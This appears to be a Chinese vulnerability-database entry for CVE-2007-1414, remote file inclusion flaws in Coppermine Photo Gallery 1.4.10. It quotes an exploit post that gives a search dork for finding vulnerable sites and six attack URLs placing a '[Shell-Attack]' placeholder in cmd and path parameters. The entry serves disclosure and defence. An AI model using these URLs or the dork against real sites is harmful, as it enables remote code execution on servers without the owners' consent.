Coppermine Photo Gallery 多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191353 漏洞类型 输入验证
发布时间 2007-03-09 更新时间 2007-05-31
CVE编号 CVE-2007-1414 CNNVD-ID CNNVD-200703-340
漏洞平台 N/A CVSS评分 10.0
|漏洞来源
https://www.securityfocus.com/bid/22896
https://cxsecurity.com/issue/WLB-2007030114
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-340
|漏洞详情
CopperminePhotoGallery(CPG)中存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到(a)image_processor.php或(b)picmgmt.inc.php的cmd参数或到(c)include/functions.php,(d)include/plugin_api.inc.php,(e)index.php或(f)pluginmgr.php的路径参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
By Hasadya Raed
Contact : RaeD (at) BsdMail (dot) Com [email concealed]
------------------------------------
Script : Coppermine Photo Gallery
Expl : Remote Include File 
Dork : "Copyright (c) 2003-2006 Coppermine Dev Team"
------------------------------------
B.Files :
image_processor.php
functions.php
picmgmt.inc.php
plugin_api.inc.php
index.php

Exploits :

http://www.Victim.Com/Script_Path/image_processor.php?cmd=[Shell-Attack]

http://www.Victim.Com/Script_Path/include/functions.php?path=[Shell-Atta
ck]
http://www.Victim.Com/Script_Path/include/picmgmt.inc.php?cmd=[Shell-Att
ack]
http://www.Victim.Com/Script_Path/include/plugin_api.inc.php?path=[Shell
-Attack]
http://www.Victim.Com/Script_Path/index.php?path=[Shell-Attack]
http://www.Victim.Com/Script_Path/pluginmgr.php?path=[Shell-Attack]

----------------------------------------

By Hasadya Raed

-- 
_______________________________________________
Get your free email from http://bsdmail.com
|受影响的产品
Coppermine Photo Gallery 1.4.10
|参考资料

来源:XF
名称:coppermine-multiple-scripts-file-include(32894)
链接:http://xforce.iss.net/xforce/xfdb/32894
来源:BID
名称:22896
链接:http://www.securityfocus.com/bid/22896
来源:BUGTRAQ
名称:20070309RemoteFileIncludeInScriptCopperminePhotoGallery
链接:http://www.securityfocus.com/archive/1/archive/1/462322/100/0/threaded
来源:BUGTRAQ
名称:20070322RemoteFileIncludeInCopperminePhotoGallery
链接:http://www.securityfocus.com/archive/1/archive/1/463532/100/0/threaded
来源:OSVDB
名称:35070
链接:http://www.osvdb.org/35070
来源:OSVDB
名称:35069
链接:http://www.osvdb.org/35069
来源:OSVDB
名称:35068
链接:http://www.osvdb.org/35068
来源:OSVDB
名称:35067
链接:http://www.osvdb.org/35067
来源:OSVDB
名称:35066
链接:http://www.osvdb.org/35066
来源:OSVDB
名称:35065
链接:http://www.osvdb.org/35065
来源:SREASON
名称:2416
链接:http://securityreason.com/securityalert/2416